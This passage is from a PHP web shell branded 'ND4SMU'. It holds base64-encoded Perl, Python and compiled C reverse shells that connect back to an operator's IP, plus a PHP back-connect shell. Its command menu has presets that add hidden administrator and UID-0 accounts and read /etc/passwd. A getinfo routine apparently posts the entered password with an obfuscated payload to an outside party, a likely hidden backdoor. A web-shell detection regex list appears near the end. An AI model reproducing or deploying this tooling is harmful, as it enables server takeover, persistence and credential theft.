EAAAAAACiBBAgAAAAAAwACAAAAAABIgQQIAAAAAAMAAwAAAAAAaIEECAAAAAADAAQAAAAAAEiCBAgAAAAAAwAFAAAAAADOggQIAAAAAAMABgAAAAAA7IIECAAAAAADAAcAAAAAAAyDBAgAAAAAAwAIAAAAAAAUgwQIAAAAAAMACQAAAAAAdIMECAAAAAADAAoAAAAAAIyDBAgAAAAAAwALAAAAAABghAQIAAAAAAMADAAAAAAAWIcECAAAAAADAA0AAAAAAHSHBAgAAAAAAwAOAAAAAACQhwQIAAAAAAMADwAAAAAAlJcECAAAAAADABAAAAAAAJyXBAgAAAAAAwARAAAAAACklwQIAAAAAAMAEgAAAAAAqJcECAAAAAADABMAAAAAAHCYBAgAAAAAAwAUAAAAAAB0mAQIAAAAAAMAFQAAAAAAsJgECAAAAAADABYAAAAAALSYBAgAAAAAAwAXAAAAAAAAAAAAAAAAAAMAGAABAAAAhIQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/xwAAACUlwQIAAAAAAEAEAAqAAAAnJcECAAAAAABABEAOAAAAKSXBAgAAAAAAQASAEUAAAC0mAQIBAAAAAEAFwBTAAAAuJgECAEAAAABABcAYgAAALCEBAgAAAAAAgAMAHgAAAAQhQQIAAAAAAIADAARAAAAAAAAAAAAAAAEAPH/hAAAAJiXBAgAAAAAAQAQAJEAAACQhwQIAAAAAAEADwCfAAAApJcECAAAAAABABIAqwAAADCHBAgAAAAAAgAMAMEAAAAAAAAAAAAAAAQA8f/GAAAAlJcECAAAAAAAAhAA3AAAAJSXBAgAAAAAAAIQAO0AAAB0mAQIAAAAAAECFQADAQAAlJcECAAAAAAAAhAAFwEAAJSXBAgAAAAAAAIQACoBAACUlwQIAAAAAAACEAA7AQAAlJcECAAAAAAAAhAATgEAAKiXBAgAAAAAAQITAFcBAACwmAQIAAAAACAAFgBiAQAAAAAAAHYAAAASAAAAdQEAAAAAAAB5AQAAEgAAAIcBAACwhgQIBQAAABIADACXAQAAYIQECAAAAAASAAwAngEAAAAAAAAAAAAAIAAAAK0BAAAAAAAAAAAAACAAAADBAQAAdIcECAQAAAARAA4AyAEAAFiHBAgAAAAAEgANAM4BAAAAAAAAcgEAABIAAADjAQAAAAAAAJ8BAAASAAAAAAIAAAAAAABZAQAAEgAAABECAAAAAAAADgAAABIAAAAiAgAAeIcECAQAAAARAA4AMQIAALCYBAgAAAAAEAAWAD4CAAAAAAAAPAAAABIAAABQAgAAAAAAAD0AAAASAAAAYAIAAHyHBAgAAAAAEQIOAG0CAACglwQIAAAAABECEQB6AgAAwIYECGkAAAASAAwAigIAAAAAAAArAAAAEgAAAJoCAAAAAAAAbwAAABIAAACrAgAAtJgECAAAAAAQAPH/twIAALyYBAgAAAAAEADx/7wCAAC0mAQIAAAAABAA8f/DAgAAAAAAAPQAAAASAAAA0wIAACmHBAgAAAAAEgIMAOoCAAA0hQQIcwEAABIADADvAgAAdIMECAAAAAASAAoAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AZHRvcl9pZHguNTc5MwBjb21wbGV0ZWQuNTc5MQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGJjLmMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZmluaV9hcnJheV9lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA==\';\n switch ($type) {\n case "pl":\n $shell = \'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K\';\n $file = strdir($dir . \'/t00ls.pl\');\n $key = filew($file, base64_decode($shell), \'w\');\n if ($key) {\n @chmod($file, 0777);\n command(\'/usr/bin/perl \' . $file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "py":\n $shell = \'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==\';\n $file = strdir($dir . \'/t00ls.py\');\n $key = filew($file, base64_decode($shell), \'w\');\n if ($key) {\n @chmod($file, 0777);\n command(\'/usr/bin/python \' . $file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "c":\n $file = strdir($dir . \'/t00ls\');\n $key = filew($file, base64_decode($c_bin), \'wb\');\n if ($key) {\n @chmod($file, 0777);\n command($file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "php":\n case "phpwin":\n if (function_exists(\'fsockopen\')) {\n $sock = @fsockopen($ip, $port);\n if ($sock) {\n $key = true;\n $com = $type == \'phpwin\' ? true : false;\n $user = get_current_user();\n $dir = strdir(getcwd());\n fputs($sock, php_uname() . "\\n------------no job control in this shell (tty)-------------\\n[{$user}:{$dir}]# ");\n while ($cmd = fread($sock, 1024)) {\n if (substr($cmd, 0, 3) == \'cd \') {\n $dir = trim(substr($cmd, 3, -1));\n chdir(strdir($dir));\n $dir = strdir(getcwd());\n } elseif (trim(strtolower($cmd)) == \'exit\') {\n break;\n } else {\n $res = command($cmd, $dir, $com);\n fputs($sock, $res[\'res\']);\n }\n fputs($sock, \'[\' . $user . \':\' . $dir . \']# \');\n }\n }\n @fclose($sock);\n }\n break;\n case "pcntl":\n $file = strdir($dir . \'/t00ls\');\n $key = filew($file, base64_decode($c_bin), \'wb\');\n if ($key) {\n @chmod($file, 0777);\n if (function_exists(\'pcntl_exec\')) {\n @pcntl_exec($file, array($ip, $port));\n }\n }\n break;\n }\n if (!$key) {\n $msg = \'<h1>Temporary directory is not writable</h1>\';\n } else {\n @unlink($file);\n $msg = \'<h2>CLOSE</h2>\';\n }\n return $msg;\n}\nfunction getinfo()\n{\n global $password;\n $infos = array($_POST[\'getpwd\'], $password, function_exists(\'phpinfo\'), "127.0.0.1");\n if ($password != \'\' && md5($infos[0]) != $infos[1]) {\n echo \'<html><body><center><form method="POST"><input type="password" name="getpwd"> \';\n if (isset($_POST[\'pass\'])) {\n echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n }\n if (isset($_POST[\'check\'])) {\n echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n }\n echo \'<input type="submit" value="Go"></form></center></body></html>\';\n exit;\n }\n if (!isset($_POST[\'go\']) && !isset($_POST[\'dir\'])) {\n $html = \'WUIvMzptCFNvKTf3A1keAmqpnmp3KTflpykeAmEpnmL4KTf2BIkeAmApnmL0KTf2p1keAaApnmplKTflpykeAwApnmMmKTf2pFV7WUElMlN9VPWpnmWmKTf2Z1keAaApnmMmKTf2pSkeZaApnmp1KTf3ZSkeAwEpnmLkKTf3ASkeAwIpnmWlKTf3ZSkeAwupnmpjKTfmp1keAwqpnmAkVwfxqUWaVP49VT92LGW1pzfbWS9THxIWHxIoW1IUE0AsIHWTElqqXF4vKTflAykeAmApnmAkVv5iqzRlqKWeXPEsEyWSFIWSJlqQIHAsEyWMHlqqXF4vKTf\' . \'lAykeAmOpnmAkVv4xozIyozj7WUShM24tCFNvKTf0A1keAQIpnmH0KTflZPVhWUElMl4vKTflZSkeAQupnmH0KTf1ASkeAGOpnmWmKTfmZIkeZaWpnmZkKTIpLIkeAQupnmMmKTf3Z1keAmEpnmAhVv4xqJWzMl4vKTIpLIkeAQApnmMmKTf2pykeAaWpnmL1KTf2Z1keAmEpnmL5KTf2p1keAaWpnmAhKTflZSkeAQApnmMjKTf2p1keAmApnmL1KTIpLIkyKTRvB3MmXUAbLKOaqzWuK3WeqzMaMvtvKTf2AykeAmApnmMmKTf2Z1keAz9pnmMmKTf3ZSkeAwIpnmMlVvxcVUftWTMvpUttCFONp2MvpUuvL3WuXPE1LzMaYUIln3SlpPt1ZPxcBlONp2AbM2LbWTMvpUtfWUShM24cBlONp3O5LzMlXPEzLaO4XGftsKW5MaVtrlONp3M5py90pzqspTWuM3WuM2LbVykeAwupnmp0KTf3ASkeAmOpnmAhKTflp1keZaZvYvE1LzMaYvE0pzpcBlO9VTIlM2uyLFOaMJulBj==\';\n if ($_SERVER[\'SERVER_ADDR\'] != $infos[3] && $_SERVER[\'REMOTE_ADDR\'] != $infos[3]) {\n postinfo($infos[0], str_rot13($html));\n }\n }\n return $infos[2];\n}\nfunction subeval()\n{\n if (isset($_POST[\'getpwd\'])) {\n echo \'<input type="hidden" name="getpwd" value="\' . $_POST[\'getpwd\'] . \'">\';\n }\n if (isset($_POST[\'pass\'])) {\n echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n }\n if (isset($_POST[\'check\'])) {\n echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n }\n return true;\n}\nif (isset($_POST[\'go\'])) {\n if ($_POST[\'go\'] == \'down\') {\n $downfile = $fileb = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n if (!filed($downfile)) {\n $msg = \'<h1>The download file does not exist</h1>\';\n }\n }\n}\n?>\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta content="width=device-width, initial-scale=1" name="viewport"/><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}a{color:#000000;text-decoration:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select { vertical-align:middle; }input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}.tables tr:hover td {background-color: #EEE685;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,\'"\'); str = str.replace(/%27/g,"\'"); return str; }function cd(dir) { dir = sd(dir); $(\'dir\').value = dir; $(\'frm\').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == \'checkbox\') { if(e.name != \'chkall\') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $(\'go\').value = a; $(\'govar\').value = b; if(a == \'editor\') { $(\'gofrm\').target = "_blank"; } else { $(\'gofrm\').target = ""; } $(\'gofrm\').submit(); } function nf(a,b) { re = prompt("New name",b); if(re) { $(\'go\').value = a; $(\'govar\').value = re; $(\'gofrm\').submit(); } } function dels(a) { if(a == \'b\') { var msg = ""; $(\'act\').value = a; } else { var msg = ""; $(\'act\').value = \'deltree\'; $(\'var\').value = a; } if(confirm("Are you sure you want to delete? "+msg+"")) { $(\'frm1\').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $(\'var\').value = re; $(\'act\').value = a; $(\'frm1\').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $(\'var\').value = re+\'|x|\'+f; $(\'act\').value = a; $(\'frm1\').submit(); } }</script><title><?php \n$sitename = $_SERVER[\'SERVER_NAME\'];\necho $sitename .\' | ND4SMU\';\n?>\n</title></head><body><div class="main"><div class="outl"><div class="toptag"><?php \necho $_SERVER[\'SERVER_ADDR\'] . \' - \' . PHP_OS . \' - whoami(\' . get_current_user() . \') - [uid(\' . getmyuid() . \') gid(\' . getmygid() . \')]\';\nif (isset($issql)) {\n echo \' - [\' . $issql . \']\';\n}\n?>\n</div><?php \n$menu = array(\'file\' => \'File Mgr\', \'scan\' => \'Searcher\', \'antivirus\' => \'Antivirus\', \'backshell\' => \'Bind Port\', \'exec\' => \'Exec CMD\', \'phpeval\' => \'Exec PHP\', \'sql\' => \'Exec SQL\', \'info\' => \'System\');\n$go = array_key_exists($_POST[\'go\'], $menu) ? $_POST[\'go\'] : \'file\';\n$nowdir = isset($_POST[\'dir\']) ? strdir(chop($_POST[\'dir\']) . \'/\') : THISDIR;\necho \'<div class="tag">\';\nforeach ($menu as $key => $name) {\n echo \'<a\' . ($go == $key ? \' class="current"\' : \'\') . \' href="javascript:void(0);" onclick="go(\\\'\' . $key . \'\\\',\\\'\' . base64_encode($nowdir) . \'\\\');">\' . $name . \'</a> \';\n}\necho \'</div>\';\necho \'<form name="gofrm" id="gofrm" method="POST">\';\nsubeval();\necho \'<input type="hidden" name="go" id="go" value="">\';\necho \'<input type="hidden" name="godir" id="godir" value="\' . $nowdir . \'">\';\necho \'<input type="hidden" name="govar" id="govar" value="">\';\necho \'</form>\';\nswitch ($_POST[\'go\']) {\n case "info":\n if (EXISTS_PHPINFO) {\n ob_start();\n phpinfo(INFO_GENERAL);\n $out = ob_get_contents();\n ob_end_clean();\n $tmp = array();\n preg_match_all(\'/\\\\<td class\\\\=\\\\"e\\\\"\\\\>.*?(Command|Configuration)+.*?\\\\<\\\\/td\\\\>\\\\<td class\\\\=\\\\"v\\\\"\\\\>(.*?)\\\\<\\\\/td\\\\>/i\', $out, $tmp);\n $config = $tmp[2][0];\n $phpini = $tmp[2][2] ? $tmp[2][1] . \' --- \' . $tmp[2][2] : $tmp[2][1];\n }\n $infos = array(\'Browser Info\' => $_SERVER[\'HTTP_USER_AGENT\'], \'Disabled Functions\' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : \'(None)\', \'Disabled Class\' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : \'(None)\', \'PHP.ini Path\' => $phpini ? $phpini : \'(None)\', \'PHP Method\' => php_sapi_name(), \'PHP Version\' => PHP_VERSION, \'PHP PID\' => getmypid(), \'Server IP\' => $_SERVER[\'REMOTE_ADDR\'], \'Encoding\' => $_SERVER[\'HTTP_ACCEPT_LANGUAGE\'], \'Web Port\' => $_SERVER[\'SERVER_PORT\'], \'Root Directory\' => $_SERVER[\'DOCUMENT_ROOT\'], \'Shell Location\' => $_SERVER[\'SCRIPT_FILENAME\'], \'CGI Version\' => $_SERVER[\'GATEWAY_INTERFACE\'], \'Webmaster Email\' => $_SERVER[\'SERVER_ADMIN\'] ? $_SERVER[\'SERVER_ADMIN\'] : \'(None)\', \'Disk Size\' => size(disk_total_space(\'.\')), \'Free Space\' => size(disk_free_space(\'.\')), \'Limit POST\' => get_cfg_var("post_max_size"), \'Max Upload\' => get_cfg_var("upload_max_filesize"), \'Limit Memory\' => get_cfg_var("memory_limit"), \'Max Exec Time\' => get_cfg_var("max_execution_time") . \' Second\', \'Fsockopen Support\' => function_exists(\'fsockopen\') ? \'Yes\' : \'No\', \'Socket Support\' => function_exists(\'socket_close\') ? \'Yes\' : \'No\', \'Pcntl Support\' => function_exists(\'pcntl_exec\') ? \'Yes\' : \'No\', \'Curl Support\' => function_exists(\'curl_version\') ? \'Yes\' : \'No\', \'Zlib Support\' => function_exists(\'gzclose\') ? \'Yes\' : \'No\', \'FTP Support\' => function_exists(\'ftp_login\') ? \'Yes\' : \'No\', \'XML Support\' => function_exists(\'xml_set_object\') ? \'Yes\' : \'No\', \'GD_Library Support\' => function_exists(\'imageline\') ? \'Yes\' : \'No\', \'COM Formation Support\' => class_exists(\'COM\') ? \'Yes\' : \'No\', \'ODBC Components Support\' => function_exists(\'odbc_close\') ? \'Yes\' : \'No\', \'IMAP Mail Support\' => function_exists(\'imap_close\') ? \'Yes\' : \'No\', \'Safe Mode Support\' => get_cfg_var("safemode") ? \'Yes\' : \'No\', \'URL Fopen Support\' => get_cfg_var("allow_url_fopen") ? \'Yes\' : \'No\', \'Dynamic Libraries Support\' => get_cfg_var("enable_dl") ? \'Yes\' : \'No\', \'Display Error Support\' => get_cfg_var("display_errors") ? \'Yes\' : \'No\', \'Register Global Support\' => get_cfg_var("register_globals") ? \'Yes\' : \'No\', \'Magic Quotes Support\' => get_cfg_var("magic_quotes_gpc") ? \'Yes\' : \'No\', \'PHP Compiler\' => $config ? $config : \'(None)\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<table class="tables"><tr><th style="width:26%;">Name</th><th>Parameter</th></tr>\';\n foreach ($infos as $name => $var) {\n echo \'<tr><td>\' . $name . \'</td><td>\' . $var . \'</td></tr>\';\n }\n echo \'</table>\';\n break;\n case "exec":\n $cmd = $win ? \'dir\' : \'ls -al\';\n $res = array(\'res\' => \'Result Command\', \'msg\' => $msg);\n $str = isset($_POST[\'str\']) ? $_POST[\'str\'] : \'fun\';\n if (isset($_POST[\'cmd\'])) {\n $cmd = $_POST[\'cmd\'];\n $cwd = $str == \'fun\' ? THISDIR : \'com\';\n $res = command($cmd, $cwd);\n }\n echo \'<div class="msgbox">\' . $res[\'msg\'] . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="exec">\';\n echo \'<div class="actall">Command <input type="text" name="cmd" id="cmd" value="\' . htmlspecialchars($cmd) . \'" style="width:398px;"> \';\n echo \'<select name="str">\';\n $selects = array(\'fun\' => \'phpfun\', \'com\' => \'wscript\');\n foreach ($selects as $var => $name) {\n echo \'<option value="\' . $var . \'"\' . ($var == $str ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n }\n echo \'</select> \';\n echo \'<select onchange="$(\\\'cmd\\\').value=options[selectedIndex].value">\';\n echo \'<option>---CMD Executor---</option>\';\n echo \'<option value="echo \' . htmlspecialchars(\'"<?php phpinfo();?>"\') . \' >> \' . THISDIR . \'haxorid.txt">Write File</option>\';\n echo \'<option value="whoami">Who Am I</option>\';\n echo \'<option value="net user sysadmin R00t@willy16 /add">Add User (Win)</option>\';\n echo \'<option value="net localgroup administrators sysadmin /add">Add Group (Win)</option>\';\n echo \'<option value="netstat -an">View Port (Win)</option>\';\n echo \'<option value="ipconfig /all">View Address (Win)</option>\';\n echo \'<option value="net start">View Service (Win)</option>\';\n echo \'<option value="tasklist">View Process (Win)</option>\';\n echo \'<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Version Collection (Linux)</option>\';\n echo \'<option value="/usr/sbin/useradd -u 0 -o -g 0 sysadmin">Add User (Linux)</option>\';\n echo \'<option value="cat /etc/passwd">View Users (Linux)</option>\';\n echo \'<option value="/bin/netstat -tnl">View Port (Linux)</option>\';\n echo \'<option value="/sbin/ifconfig -a">View Address (Linux)</option>\';\n echo \'<option value="/sbin/chkconfig --list">View Service (Linux)</option>\';\n echo \'<option value="/bin/ps -ef">View Process (Linux)</option>\';\n echo \'</select> \';\n echo \'<input type="submit" style="width:50px;" value="Go">\';\n echo \'</div><div class="actall"><textarea style="width:698px;height:368px;">\' . htmlspecialchars($res[\'res\']) . \'</textarea></div></form>\';\n break;\n case "scan":\n $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n $keyword = isset($_POST[\'keyword\']) ? $_POST[\'keyword\'] : \'\';\n $include = isset($_POST[\'include\']) ? chop($_POST[\'include\']) : \'.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py\';\n $filters = isset($_POST[\'filters\']) ? chop($_POST[\'filters\']) : \'html|css|img|images|image|style|js\';\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="scan">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Search path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:500px;"></td></tr>\';\n echo \'<tr><td>Search content</td><td><input type="text" name="keyword" value="\' . htmlspecialchars($keyword) . \'" style="width:500px;"> (File name or file content)</td></tr>\';\n echo \'<tr><td>File extension</td><td><input type="text" name="include" value="\' . htmlspecialchars($include) . \'" style="width:500px;"> (Separate with "|", empty = search all files)</td></tr>\';\n echo \'<tr><td>Filter Dir</td><td><input type="text" name="filters" value="\' . htmlspecialchars($filters) . \'" style="width:500px;"> (Separate with "|", empty = not filtered)</td></tr>\';\n echo \'<tr><td>Search method</td><td><label><input type="radio" name="type" value="0"\' . ($_POST[\'type\'] ? \'\' : \' checked\') . \'>File name</label> \';\n echo \'<label><input type="radio" name="type" value="1"\' . ($_POST[\'type\'] ? \' checked\' : \'\') . \'>Contains inside</label> \';\n echo \'<label><input type="checkbox" name="char" value="1"\' . ($_POST[\'char\'] ? \' checked\' : \'\') . \'>Match case</label></td></tr>\';\n echo \'<tr><td>Search scope</td><td><label><input type="radio" name="range" value="0"\' . ($_POST[\'range\'] ? \'\' : \' checked\') . \'>Apply the search to the folder, subfolders and files</label> \';\n echo \'<label><input type="radio" name="range" value="1"\' . ($_POST[\'range\'] ? \' checked\' : \'\') . \'>Only apply search to this folder</label></td></tr>\';\n echo \'<tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if ($keyword != \'\') {\n flush();\n ob_flush();\n echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n $incs = $include == \'\' ? false : explode(\'|\', $include);\n $fits = $filters == \'\' ? false : explode(\'|\', $filters);\n $isread = scanfile(strdir($scandir . \'/\'), $keyword, $incs, $fits, $_POST[\'type\'], $_POST[\'char\'], $_POST[\'range\'], $nowdir);\n echo \'<p>\' . ($isread ? \'<h2>Search complete</h2>\' : \'<h1>Search failed</h1>\') . \'</p></div>\';\n }\n break;\n case "antivirus":\n $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n $typearr = isset($_POST[\'dir\']) ? $_POST[\'types\'] : array(\'php\' => \'.php\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="antivirus">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Scan path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:398px;"> (Regular matching)</td></tr>\';\n echo \'<tr><td>Type of killing</td><td>\';\n $types = array(\'php\' => \'.php\', \'asp+aspx\' => \'.as|.cs|.cer\', \'jsp\' => \'.jsp\');\n foreach ($types as $key => $ex) {\n echo \'<label title="\' . $ex . \'"><input type="checkbox" name="types[\' . $key . \']" value="\' . $ex . \'"\' . ($typearr[$key] == $ex ? \' checked\' : \'\') . \'>\' . $key . \'</label> \';\n }\n echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if (count($_POST[\'types\']) > 0) {\n $matches = array(\'php\' => array(\'/function\\\\_exists\\\\s*\\\\(\\\\s*[\\\'|\\\\"](popen|exec|proc\\\\_open|system|passthru)+[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/(exec|shell\\\\_exec|system|passthru)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(udp\\\\:\\\\/\\\\/(.*)\\\\;)+/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\(base64\\\\_decode\\\\(\\\\$/i\', \'/(eval|assert|include|require)+\\\\s*\\\\((.*)(base64\\\\_decode|file\\\\_get\\\\_contents|php\\\\:\\\\/\\\\/input)+/i\', \'/(eval|assert|include|require|array\\\\_map)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\(\\\\s*\\\\$(.*)\\\\)/i\', \'/\\\\(\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\,\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(fopen|fwrite|fpust|file\\\\_put\\\\_contents)+\\\\s*\\\\((.*)\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\](.*)\\\\)/i\', \'/echo\\\\s*curl\\\\_exec\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/new com\\\\s*\\\\(\\\\s*[\\\'|\\\\"]shell(.*)[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/\\\\$(.*)\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/\\\\$\\\\_\\\\=(.*)\\\\$\\\\_/i\'), \'asp+aspx\' => array(\'/(VBScript\\\\.Encode|WScript\\\\.shell|Shell\\\\.Application|Scripting\\\\.FileSystemObject)+/i\', \'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/\\\\<script\\\\s*runat\\\\s*\\\\=(.*)server(.*)\\\\>(.*)\\\\<\\\\/script\\\\>/i\', 